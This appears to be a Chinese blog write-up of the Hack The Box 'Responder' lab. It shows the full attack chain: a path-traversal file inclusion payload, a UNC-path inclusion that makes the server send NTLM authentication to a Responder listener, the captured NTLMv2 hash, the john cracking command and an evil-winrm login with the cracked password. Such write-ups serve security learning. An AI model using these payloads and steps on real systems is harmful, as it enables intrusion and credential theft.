侧边栏壁纸
博主头像
L1

write and record

  • 累计撰写 12 篇文章
  • 累计创建 3 个标签
  • 累计收到 1 条评论
标签搜索

目 录CONTENT

文章目录
HTB

HTB-Responder

L1
L1
2022-10-17 / 0 评论 / 0 点赞 / 54 阅读 / 605 字

关键词:

  • SAMBA

  • Enumeration

  • Apache

  • WinRM

思路:

  1. 目标ip,
  2. nmap扫描开放服务
  3. 发现网站,url参数page=,尝试文件包含漏洞../../../../../../../../windows/system32/drivers/etc/hosts,
  4. 确认存在本地文件包含,尝试远程文件包含虽然有限制,但是可以尝试smb服务利用responder捕获windows认证NTLM
  5. 使用john the ripper工具解密NTLM hash获取administrator密码
  6. 通过evil-winrm登陆上windows服务器,拿到flag

记录

nmap扫描

nmap -sV -p- --min-rate 5000 ip
-sV : 探测开放服务端口
-p- : 探测所有tcp端口
--min-rate : 设置每秒发报数量

网站漏洞

http://unika.htb/index.php?page=french.html
# page= 可尝试文件包含漏洞
http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts

# Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost

本地文件包含 LFI

LFI or本地文件包含 
攻击者可以通过在输入的文件名中使用../字符串来利用它并最终查看本地文件系统中的敏感文件
在某些有限的情况下,LFI 可能会导致代码执行
 RFI or Remote File Inclusion is similar to LFI but in this case it is possible for an attacker to load a remote
file on the host using protocols like HTTP, FTP etc.

远程文件包含 RFL

攻击者可以通过http或ftp加载远程文件进行攻击

responder抓NTLM

安装并使用responder 监听
# 下载responder
git clone https://github.com/lgandx/Responder
# 查看responder配置文件
cat Responder.conf
# 安装
pip3 install -r requirement.txt
pacman -S python-netifaces
# 使用
sudo python3 Responder.py -I tun0
网站远程连接主机ip
http://unika.htb/index.php?page=//ip/somefile
responder收集到NTLM
[SMB] NTLMv2-SSP Client   : 10.129.57.172
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:d8f31ec8876dc816:6F444ECB8774666A487FCB4CE8294D06:010100000000000000F5EE093CE2D801BA350B5C4A46DDB700000000020008004C0044004100590001001E00570049004E002D00330035004B0053004F005300550035004B004700420004003400570049004E002D00330035004B0053004F005300550035004B00470042002E004C004400410059002E004C004F00430041004C00030014004C004400410059002E004C004F00430041004C00050014004C004400410059002E004C004F00430041004C000700080000F5EE093CE2D8010600040002000000080030003000000000000000010000000020000043CDDE801A60BE97C4DE46DBA5ABA360E58EABC6F756F597B2B78821BB15E7330A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0032000000000000000000

john撞密码

# 先保存hash
echo "Administrator::RESPONDER:d8f31ec8876dc816:6F444ECB8774666A487FCB4CE8294D06:010100000000000000F5EE093CE2D801BA350B5C4A46DDB700000000020008004C0044004100590001001E00570049004E002D00330035004B0053004F005300550035004B004700420004003400570049004E002D00330035004B0053004F005300550035004B00470042002E004C004400410059002E004C004F00430041004C00030014004C004400410059002E004C004F00430041004C00050014004C004400410059002E004C004F00430041004C000700080000F5EE093CE2D8010600040002000000080030003000000000000000010000000020000043CDDE801A60BE97C4DE46DBA5ABA360E58EABC6F756F597B2B78821BB15E7330A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0032000000000000000000" > hash.txt

# 使用john撞出密码
john -w=/wordlist/rockyou.txt hash.txt

winrm连接

evil-winrm -i 10.129.136.91 -u administrator -p badminton

参考链接

rockyou.txt

NTLM是什么?

john the ripper

responder

evil-winrm

0

评论区